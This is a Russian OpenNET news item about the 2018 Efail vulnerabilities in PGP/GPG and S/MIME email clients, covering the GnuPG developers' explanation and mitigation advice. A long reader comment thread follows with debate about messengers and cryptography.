The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

14.05.2018 10:58  Критическая уязвимость в системах шифрования email на основе PGP/GPG и S/MIME

Себастьян Шинцель (Sebastian Schinzel), авторитетный немецкий эксперт по компьютерной безопасности (один из авторов атаки DROWN), предупредил о выявлении критических уязвимостей в системах шифрования почтовой переписки, основанных на использовании PGP/GPG и S/MIME. Проблемы позволяют определить исходный открытый текст шифрованных писем, в том числе отправленных ранее зашифрованных писем. В настоящее время доступно лишь общее предупреждение, детали будут раскрыты 15 мая в 7 утра (UTC). Проблемам присвоено имя Efail.

Правозащитная организация Electronic Frontier Foundation (EFF) подтвердила, что выявленные уязвимости относятся к разряду наиболее критических проблем и представляют серьёзных риск для пользователей шифрованных коммуникаций по электронной почте, особенно так как проблемы позволяют получить доступ к содержимому ранее отправленных зашифрованных сообщений.

Утверждается, что надёжно работающих исправлений проблем пока не существует, поэтому пользователям PGP/GPG и S/MIME предлагается отключить в почтовых клиентах инструменты, поддерживающие автоматическую расшифровку сообщений. До формирования исправлений пользователям предлагается временно прекратить использование PGP для отправки и приёма писем и воспользоваться альтернативными каналами обмена шифрованными сообщениями, такими как Signal. Инструкции по отключению PGP/GPG и S/MIME подготовлены для Thunderbird с Enigmail, Apple Mail c GPGTools и Outlook c Gpg4win.

Судя по отрывочным сведениям, уязвимости напрямую не затрагивают PGP/GPG и S/MIME, а проявляются в конечных решениях на базе данных систем для почтовых клиентов и связаны с функциями автоматической расшифровки. С другой стороны, среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах.

Дополнение: Разработчики GnuPG успокоили пользователей, что проблема напрямую не касается GnuPG и Enigmail, а затрагивает методы использования PGP в почтовых клиентах. Дополнительно появилось пояснение, что проблема касается только писем, переданных в формате HTML, т.е. из которых могут выполняться обращения к внешним ресурсам.

Судя по всему, проблема связана с тем, что HTML может использоваться как канал для подстановки в письма заранее известных меток (oracle), например, через манипуляции с тегом "img". Из-за недоработок в MIME-парсерах почтовых клиентов наличие в тексте подобных меток приводят к объединению связанных с ними фрагментов с расшифрованными MIME-блоками. Данная особенность может применяться для организации атак на основе подобранного шифротекста.

В качестве мер защиты разработчики GnuPG предлагают использовать аутентифицированное шифрование, например, рекомендуется использовать поддерживаемый в GnuPG с 2002 года механизм MDC (Modification Detection Codes) для предотвращения подстановки сторонних данных в содержимое. Атака становится невозможной, если в почтовом клиенте корректно используется MDC или реализован правильный MIME-парсер. Общий вывод: уязвимость не затрагивает протокол OpenPGP и его реализацию GnuPG, а охватывает только отдельные почтовые клиенты, в которых некорректно организован процесс шифрования, загружается содержимое внешних ссылок в HTML-тексте и отсутствует проверка MDC.

Дополнение 2: Досрочно раскрыты подробности атаки (для уязвимости создан отдельный сайт efail.de). Описание деталей изложено в отдельной новости.

  1. Главная ссылка к новости (https://www.eff.org/deeplinks/...)
  2. OpenNews: Выявлен дубликат короткого идентификатора PGP-ключа Линуса Торвальдса
  3. OpenNews: Обновление GnuPG с устранением уязвимости, позволяющей восстановить закрытые RSA-ключи
  4. OpenNews: Критическая уязвимость в генераторе случайных чисел GnuPG и Libgcrypt
  5. OpenNews: В Libgcrypt/GnuPG выявлена уязвимость, позволяющая воссоздать RSA-ключи
  6. OpenNews: В рамках проекта NeoPG развивается форк GnuPG 2
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: pgp, smime, gpg, gnupg
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, Онвоним (?), 11:03, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]
  • +/
    Зачем альтернативные каналы и signal? Просто отключить автоматическую расшифровку, и делать это руками.
     
     
  • 2.5, Онанимус (?), 11:08, 14/05/2018 [^] [ответить]    [к модератору]
  • +2 +/
    Таки да! Тем более не понятна связь между автоматической расшифровкой и уязвимостью зашифровки.
     
     
  • 3.10, Онвоним (?), 11:34, 14/05/2018 [^] [ответить]     [к модератору]
  • +/
    Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незаш... весь текст скрыт [показать]
     
     
  • 4.31, Онанимус (?), 12:08, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    IMAP Но в таком случае, уязвим трафик до IMAP сервера Дальше то письмо идет ши... весь текст скрыт [показать]
     
  • 1.2, лютый охохонюшка (?), 11:05, 14/05/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –10 +/
    А ведь неломаемое шифрование изобрели ещё при царе Горохе, одноразовые шифр-блок... весь текст скрыт [показать]
     
     
  • 2.4, Кир (?), 11:07, 14/05/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    ... и наградил всех счастливых потенциальных корреспондентов гигабайтами мусора ...
     
  • 2.6, Креативные инноваторы (?), 11:08, 14/05/2018 [^] [ответить]    [к модератору]  
  • +13 +/
    повод съездить друг к другу в гости, да
     
  • 2.105, angra (ok), 21:08, 14/05/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    И как тебе эти блокноты помогут в ситуации, когда уязвимость не в самом механизме методе шифрования или ключе, а в взаимодействии клиентского софта с этим механизмом? Или ты новость не читал?
     
  • 1.3, Креативные инноваторы (?), 11:06, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +8 +/
    Настало время создавать логотип, логотип сам себя не создаст.
     
     
  • 2.11, Andrey Mitrofanov (?), 11:36, 14/05/2018 [^] [ответить]     [к модератору]  
  • –2 +/
    Дыкыть анонса-то не было ещё Это слухи-утечки, подогревающие интерес покупател... весь текст скрыт [показать]
     
     
  • 3.13, Аноним (-), 11:37, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    по итогам, новость выеденного яйца не стоит
     
  • 3.15, Andrey Mitrofanov (?), 11:40, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > и на погоняло креатифное,

    " Проблемам присвоено имя Efail. "

    Я прочитал наверху, да.  //IMNSHO лучше б денег подождали -- чего покреативнее приду ^W купили б.

     
  • 3.18, Аноним (-), 11:43, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    cTLD .apple ещё не занята ...
    Эппл её хрен отсудит, так как можно сказать, что она для продавцов и культиваторов яблоневых саженцев, но зато они могут её заблочить в гейфонах.
     
  • 2.73, Вареник (?), 17:11, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    И озаботиться рассово-половым составом команды разрабов.
     
  • 1.7, Аноним (-), 11:23, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +3 +/
    https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
     
     
  • 2.32, Andrey Mitrofanov (?), 12:08, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Акхр HTML mails автоматическое рас шифровывание Расходимся, пацаны I ... весь текст скрыт [показать]
     
     
  • 3.103, Аноним (-), 21:03, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    >Use authenticated encryption.

    Кто-то ещё юзает unauthenticated encryption?

     
  • 1.8, Онаним (?), 11:27, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –10 +/
    В очередной раз убеждаюсь: хочешь сделать хорошо - сделай это сам. Систему шифрования для своего бизнеса - изучи вопрос, и пиши сам.
     
     
  • 2.9, sabakka (?), 11:32, 14/05/2018 [^] [ответить]    [к модератору]  
  • +16 +/
    люди годами не могут сделать, онаним запилит все за пару недель.
     
     
  • 3.12, Аноним (-), 11:36, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    делается ставка на неуловимого Джо
     
  • 2.16, pull request (?), 11:42, 14/05/2018 [^] [ответить]    [к модератору]  
  • +14 +/
    Первое правило криптографии - никогда не придумывай свою систему криптографии.
     
     
  • 3.23, Ivan_83 (ok), 11:54, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    забыл авторство АНБ указать :)
     
     
  • 4.104, Аноним (-), 21:05, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > забыл авторство АНБ указать :)

    Интересно служил ли Брюс Шнайер в АНБ?

     
     
  • 5.108, Аноним (-), 21:13, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Вроде бы нет Но как минимум пару своих же алгоритмов он более не рекомендует, а... весь текст скрыт [показать]
     
  • 3.27, Аноним (-), 11:56, 14/05/2018 [^] [ответить]    [к модератору]  
  • +3 +/
    С этим правилом никакой криптографии бы не было.
     
     
  • 4.36, Andrey Mitrofanov (?), 12:33, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    >никакой криптографии бы не

    Никакой фантазии у людей.

     
     
  • 5.124, konst55512 (?), 01:31, 15/05/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Есть фантазии Самый безопасный метод общения между мной и В Пупкиным такой исп... весь текст скрыт [показать]
     
     
  • 6.125, arisu (ok), 01:44, 15/05/2018 [^] [ответить]     [к модератору]  
  • +/
    лолушки вот и Профессионалы Криптоанализа пожаловали эти ваши гуаношифры как р... весь текст скрыт [показать]
     
     
  • 7.127, konst55512 (?), 03:20, 15/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Вы категоррически не правы imho Я говорил о том, что расшифровать tr abc bca ... весь текст скрыт [показать]
     
     
  • 8.128, arisu (ok), 10:27, 15/05/2018 [^] [ответить]    [к модератору]  
  • +/
    я не знаю, что такое «простые боты», и какое они отношение имеют к шифрованию. впрочем, защищаться от воображаемых атакующих — дело приятное и даже иногда прибыльное.
     
  • 8.131, Аноним (-), 00:33, 16/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Криптография она как осетрина - бывает только первой свежести Второй сорт - так... весь текст скрыт [показать]
     
  • 4.45, rshadow (ok), 13:10, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Итальянская забастовка: делать все _абсолютно в точности_ написанным правилам.
     
  • 4.66, Аноним (-), 15:07, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Именно поэтому правила криптографии появились уже после появления криптографии.
     
  • 3.34, Andrey Mitrofanov (?), 12:23, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    I If you think technology can solve your security problems, then you don t un... весь текст скрыт [показать]
     
  • 3.39, pkdr (ok), 12:48, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Если бы так думали все, то до сих пор бы шифровали решётками, как у Жюля Верна или человечками, как у Конан Дойла.
     
  • 3.48, unxed (?), 13:26, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    А вот использовать индустриальный стандарт одновременно со своей криптографией э... весь текст скрыт [показать]
     
     
  • 4.62, Аноним84701 (ok), 14:53, 14/05/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Все верно, ведь все-все дыры во всех-всех алгоритмах причем сразу со сплойтами ... весь текст скрыт [показать]
     
     
  • 5.72, kk (??), 17:01, 14/05/2018 [^] [ответить]    [к модератору]  
  • +2 +/
    анальные карты очень наверное страшны когда на кону тысячи биткоинов
    ну что вы в самом деле
     
     
  • 6.74, Аноним84701 (ok), 17:13, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Зато обосновывать отсутствие дыр в алгоритмах тем, что бывшие сотрудники АНБ не ... весь текст скрыт [показать]
     
  • 6.113, Anonimous (?), 21:31, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    полагаю, что в спецслужбах как в мафии анальные карты за серьезный проступок ... весь текст скрыт [показать]
     
  • 2.65, Ан (??), 15:07, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Боюсь, на бизнесс времени не останется =) А если все и получится, то придут вежливые люди и попросят изменить алгоритм на гост и попутно отдать ключи
     
     ....нить скрыта, показать (23)

  • 1.14, Andrew (??), 11:37, 14/05/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • –7 +/
    99 пользователей имеют очень отдаленное представление о механизмах безопасности... весь текст скрыт [показать]
     
     
  • 2.17, Аноним (-), 11:43, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Ископаемое, согласен. Но что на замену?
     
     
  • 3.20, Аноним (-), 11:52, 14/05/2018 [^] [ответить]    [к модератору]  
  • –6 +/
    очевидный телеграм очевиден
     
     
  • 4.25, Ivan_83 (ok), 11:56, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей и их приватность.
     
     
  • 5.28, Аноним (-), 11:57, 14/05/2018 [^] [ответить]    [к модератору]  
  • –9 +/
    > телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей
    > и их приватность.

    Сигнал да, но телеграм борется за свободы пользователей и их приватность.

     
     
  • 6.33, Вы забыли заполнить поле Name (?), 12:12, 14/05/2018 [^] [ответить]    [к модератору]  
  • +11 +/
    Насмешил. Дуруов и Ко борются за свои денюшки и делают пиар для таких как ты.
     
     
  • 7.38, Crazy Alex (ok), 12:47, 14/05/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Насколько я понимаю, у них одно другому не мешает - но это пока противоречия нет... весь текст скрыт [показать]
     
     
  • 8.46, rshadow (ok), 13:13, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    > у них одно другому не мешает

    Так себе утверждение. Пиарили-то серетные чаты, которыми никто не пользуется. А оказалось все как всегда.

     
     
  • 9.47, Аноним (-), 13:23, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Говори только за себя.
     
     
  • 10.50, unxed (?), 13:33, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Наличие секретных чатов при доступности не секретных само по себе свидетельство ... весь текст скрыт [показать]
     
     
  • 11.51, Аноним (-), 13:48, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Эти ваши бетховены никем не признанные фантики.
     
     
  • 12.129, unxed (?), 13:29, 15/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Какая разница, пока их можно обменять на кем-то признанные фантики.
     
  • 9.76, Crazy Alex (ok), 17:28, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Нормальное утверждение Получать прибыль с пользовательской базы не обязательно ... весь текст скрыт [показать]
     
     
  • 10.80, Andrey Mitrofanov (?), 17:41, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Морочить голову надо _отсутствием_ слежки, _гарантированным_ отсутствием на уров... весь текст скрыт [показать]
     
     
  • 11.81, Andrey Mitrofanov (?), 17:44, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Ещё неплохо заморочиться _гарантированным_ из,у беганием ,от угроз на уровне ... весь текст скрыт [показать]
     
  • 11.84, Crazy Alex (ok), 17:59, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Кому-то надо, а кому-то и нет Что за манера решать за других, что им нужно и ч... весь текст скрыт [показать]
     
  • 8.58, Ivan_83 (ok), 14:25, 14/05/2018 [^] [ответить]     [к модератору]  
  • +2 +/
    Огрызок интенсивно пеарится, как и все американские сервисы Их цель - создать в... весь текст скрыт [показать]
     
     
  • 9.75, Crazy Alex (ok), 17:20, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Кто там что им гарантирует - это уже фантазии пошли Не то, чтобы этого быть не ... весь текст скрыт [показать]
     
     
  • 10.91, Ivan_83 (ok), 18:23, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Как маленький А госы ихние по твоему что маки и венду не покупают Это самое оч... весь текст скрыт [показать]
     
  • 6.57, Ivan_83 (ok), 14:22, 14/05/2018 [^] [ответить]     [к модератору]  
  • +3 +/
    Любой централизованный месенгер никогда не даст никаких свобод, пользователь для... весь текст скрыт [показать]
     
     
  • 7.79, Crazy Alex (ok), 17:37, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Ну я вот не представляю, как можно сделать надёжный, удобный и не особо жручий P... весь текст скрыт [показать]
     
     
  • 8.82, arisu (ok), 17:45, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    потому что не надо ничего такого делать для 171 простых людей 187 если чело... весь текст скрыт [показать]
     
     
  • 9.83, Crazy Alex (ok), 17:50, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Ну я ж даже примеры привёл с SSL и наркотой - оно вполне прилично защищает от пр... весь текст скрыт [показать]
     
     
  • 10.86, arisu (ok), 18:09, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    для того, от чего 171 защищает 187 ssl 8212 он сильно переусложнён а мел... весь текст скрыт [показать]
     
     
  • 11.92, Ordu (ok), 18:36, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Естественно Я бы тоже так сказал А вот тут ты не прав Я делал так, и продолжа... весь текст скрыт [показать]
     
     
  • 12.109, Аноним (-), 21:19, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Ух ты, тут как раз в соседней ветке freehck завалился в такой режим! Из всех аргументов - вопли что я ламер. А это оказывается вот оно что! Ух спасибище за объясение эффекта.
     
  • 12.114, Anonimous (?), 21:42, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Моё наивысшее достижение -- я человека довёл Сдаётся мне, что тот человек в ко... весь текст скрыт [показать]
     
     
  • 13.117, Ordu (ok), 22:19, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Да какая мне разница, куда он там зрил, если он от увиденного зрелища регрессиро... весь текст скрыт [показать]
     
  • 12.116, arisu (ok), 21:51, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    это потому, что ты и есть дурак. такие дела.
     
     
  • 13.118, Ordu (ok), 22:22, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > это потому, что ты и есть дурак. такие дела.

    И чё? Я и без хомячьих подсказок знаю, собственно, и не скрываю. Ну, не кричу на всех углах об этом, конечно, но и не скрываю.

     
     
  • 14.120, Анонним (?), 00:12, 15/05/2018 [^] [ответить]    [к модератору]  
  • +/
    все хомяки, а я мамкин психоаналитик! Регрессия, говорите?
     
     
  • 15.121, Ordu (ok), 00:44, 15/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Так это не я говорю -- это Фройд говорил Ты можешь заглянуть в википедию и убед... весь текст скрыт [показать]
     
     
  • 16.123, Anonimous (?), 01:03, 15/05/2018 [^] [ответить]     [к модератору]  
  • +/
    это ты ловко с темы спрыгнул на этом, пожалуй, и закончим ... весь текст скрыт [показать]
     
  • 13.132, Аноним (-), 03:07, 16/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Парадокс в том что это пофиг Если некто демонстрирует уровень имбецила на публи... весь текст скрыт [показать]
     
  • 8.94, Ivan_83 (ok), 19:31, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Нет промежуточной позиции Поскольку оно привязано к мобиле - того кого надо быс... весь текст скрыт [показать]
     
     
  • 9.96, Crazy Alex (ok), 19:57, 14/05/2018 [^] [ответить]     [к модератору]  
  • –1 +/
    Ну вот тебе и промежуточная позиция - для триангуляции и подобного надо заинтере... весь текст скрыт [показать]
     
     
  • 10.122, Anonimous (?), 00:50, 15/05/2018 [^] [ответить]     [к модератору]  
  • +/
    для триангуляции и подобного надо заинтересовать власти это работает до тех по... весь текст скрыт [показать]
     
  • 5.29, Аноним (-), 11:58, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    как будто днс, который использует емейлом, не является таковым Только почтовые ... весь текст скрыт [показать]
     
     
  • 6.37, Andrey Mitrofanov (?), 12:38, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    >днс, который использует емейлом, не

    Deeper, bro[I]!

    https://gnunet.org/gns / https://duckduckgo.com/?q=gnunet+dns
    /https://duckduckgo.com/?q=dht+dns /... //... ...

     
  • 6.102, Михрютка (ok), 21:00, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    шутки шутками, а whois 25 числа обещали прикрыть, бо gdpr compliance
     
  • 5.30, Аноним (-), 12:02, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Ring, Tox
     
  • 3.21, Аноним (-), 11:53, 14/05/2018 [^] [ответить]    [к модератору]  
  • –3 +/
    Телеграм.
     
     
  • 4.43, Аноним (-), 12:56, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
     
     
  • 5.49, Аноним (-), 13:30, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    чтобы монетизировать сервис
     
     
  • 6.55, Аноним (-), 14:03, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > чтобы монетизировать сервис

    Каким образом?


     
  • 5.52, Аноним (-), 13:50, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Кто бы объяснил: на фига опеннет привязан к почтовому ящику?
     
     
  • 6.63, Аноним (-), 14:55, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    "Гениальное" сравнение, молодец
     
     
  • 7.64, Аноним (-), 14:59, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Ты считаешь есть разница?
     
     
  • 8.90, Ordu (ok), 18:20, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Да Я могу создать сколько угодно почтовых ящиков И очень часто создаю под новы... весь текст скрыт [показать]
     
     
  • 9.133, Аноним (-), 03:11, 16/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Это ты плохо искал Есть такие Недорого и круто У некоторых даже есть демо-ном... весь текст скрыт [показать]
     
  • 7.67, Аноним (-), 15:18, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Hacke Nnews вообще-то прекрасно обходится без почты
     
     
  • 8.78, arisu (ok), 17:36, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > Hacke Nnews вообще-то прекрасно обходится без почты

    а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой почтовый адрес.

     
     
  • 9.88, Аноним (-), 18:14, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Мы тебе про регистрацию, а ты про комментарий.
     
  • 9.106, Михрютка (ok), 21:09, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    походу почтовый адрес моей учетки на опеннете не существует, как и домен это мн... весь текст скрыт [показать]
     
     
  • 10.115, arisu (ok), 21:44, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    глупый анонимус не в курсе, что на опеннете email при регистрации нужен исключительно для того, чтобы туда присылали комментарии, и вводить можно любую несуществующую фигню. но зато он Мнение Имеет!
     
  • 5.111, Михрютка (ok), 21:22, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    коллега, если вы приучите простого пользователя, испорченного смартфонами, занос... весь текст скрыт [показать]
     
     
  • 6.126, Аноним (-), 02:11, 15/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Кому нравится - пусть при регистрации указывает телефонный номер, но зачем же это навязывать?
     
     
  • 7.130, Михрютка (ok), 23:40, 15/05/2018 [^] [ответить]    [к модератору]  
  • +/
    на киевстар пожалуйся. они на каждой симке телефонный номер навязывают.
     
  • 6.134, Аноним (-), 03:23, 16/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Телефонный номер в смс - весьма абстрактная штука Если так посмотреть что в нем... весь текст скрыт [показать]
     
  • 4.59, Ivan_83 (ok), 14:28, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    ггг как вам мозги то промыли.
    Телега от аськи и мыло агента отличается только в худьшую сторону, ибо аська с агентом изначально мобилу не требовали и их можно было юзать не имея/не светя свой номер.
     
  • 3.22, Вещества (?), 11:54, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    жаббер с omemo
     
  • 3.24, Аноним (-), 11:56, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    DIME Ладара Левисона?
     
  • 3.26, 1 (??), 11:56, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    хипстерский телеграмчик.

    А по делу. Почта на бумаге - это 19 век (если не раньше) но всё как-то не избавиться.

     
     ....нить скрыта, показать (62)

  • 1.19, Нанобот (ok), 11:52, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    >среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах

    не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут своё экспертное заключение 😂

     
     
  • 2.35, Andrey Mitrofanov (?), 12:32, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Особенно глубока и хорошо проработана экспертиза заключений эксертов по эксперти... весь текст скрыт [показать]
     
  • 1.40, Annoynymous (ok), 12:49, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Мы нашли уязвимость, но мы вам её не покажем, не расскажем и вообще, о чём новость?
     
     
  • 2.44, Ordu (ok), 13:01, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    О том, что у тебя есть время до завтра подумать и хоть как-то среагировать на грядущее раскрытие уязвимости.
     
     
  • 3.53, Andrey Mitrofanov (?), 13:52, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру -ы , машин... весь текст скрыт [показать]
     
     
  • 4.89, Ordu (ok), 18:16, 14/05/2018 [^] [ответить]     [к модератору]  
  • +/
    Нет, там же написано, что судя по всему будет достаточно срочно сменить email-кл... весь текст скрыт [показать]
     
  • 3.60, Аноним (-), 14:33, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Уже нету
    https://efail.de/
     
     
  • 4.61, Andrey Mitrofanov (?), 14:37, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > Уже нету
    > https://efail.de/

    Ждём посадок.

     
     
  • 5.68, Ураган (?), 15:24, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    На бутыль?
     
  • 1.41, Аноним (-), 12:52, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • –2 +/
    А какое шифрование используется в почте safe-mail.net и tutanota?
     
     
  • 2.42, Аноним (-), 12:54, 14/05/2018 [^] [ответить]    [к модератору]  
  • –1 +/
    Никакое.
     
  • 2.85, Darth Vader (?), 18:03, 14/05/2018 [^] [ответить]    [к модератору]  
  • +1 +/
    Use Protonmail, Luke!
     
     
  • 3.87, Аноним (-), 18:10, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    Они хохлам всё сливали. Не вариант.
     
     
  • 4.112, Анонимус2333 (?), 21:27, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    А где про это можно почитать? Ссылкой поделитесь, пожалуйста.
     
  • 2.93, Аноним (-), 19:31, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    тоже самое что и у протона, вроде - опенпгп на жс. Учитывая что закрытые ключи этих сервисов юзверю не доступны - я бы не считал их чем то сесурным
     
  • 1.54, Аноним (-), 13:54, 14/05/2018 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Интересно как это отразиться на каком-нибудь Mutt ... весь текст скрыт [показать]
     
     
  • 2.69, alex53 (ok), 16:37, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    На mutt сам по себе - никак. Проблемы будут только если для написания писем будет использоваться html редактор.
     
     
  • 3.119, КО (?), 23:21, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    И даже в этом случае в нормальном клиенте не страшно - ибо его html по умолчанию он в инет не выходит.
     
  • 1.56, Аноним (-), 14:07, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Пока вы тут комментите, уже подробности опубликовали:
    https://efail.de/
     
     
  • 2.71, annual slayer (?), 16:41, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    с логотипом уже, кстати ;)
     
  • 1.70, Аноним (70), 16:38, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Ну дык дырявые клиенты, дырявый HTML, а не сами GPG и GPG4win. Ручками вставлять и проверять, ручками. Развели тут панику.
     
     
  • 2.77, Аноним (-), 17:35, 14/05/2018 [^] [ответить]    [к модератору]  
  • –2 +/
    Думаешь в самом GPG нет дыр? Верить в идеальность софта в 2018?
     
  • 1.95, Аноним (-), 19:32, 14/05/2018 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    >только писем, переданных в формате HTML

    пересылать конфиденциальную инфу в хтмл - ссзб

     
     
  • 2.97, Аноним84701 (ok), 20:23, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    >>только писем, переданных в формате HTML
    > пересылать конфиденциальную инфу в хтмл - ссзб

    Не пересылать в HTML не поможет. Поможет не расшифровывать или же не рендерить (альтернативно: не допускать при этом никаких внешних запросов).
    См. вполне доходчивый пример:
    https://efail.de/ (Direct Exfiltration)

    Кстати, как и ожидалось - Claws и Мutt  (ну и еще несколько менее удобных, второстепенных клиентов) уязвимости не подвержены :)

     
     
  • 3.98, arisu (ok), 20:29, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
     
     
  • 4.100, Аноним (-), 20:41, 14/05/2018 [^] [ответить]     [к модератору]  
  • +1 +/
    Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылк... весь текст скрыт [показать]
     
     
  • 5.101, arisu (ok), 20:55, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
    > и скидывать его в ремотный канал? Так, глядя на это безобразие.

    зависит от криворукости авторов клиентов. в принципе, все нормальные клиенты должны запрещать такие шутки… но с другой стороны: нормальные люди не пишут клиентов с поддержкой html в письмах.

     
  • 5.107, Аноним84701 (ok), 21:10, 14/05/2018 [^] [ответить]    [к модератору]  
  • +/
    > Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
    > и скидывать его в ремотный канал? Так, глядя на это безобразие.

    А смысл?
    Принципиально расшифровка и leak делаются вот так:
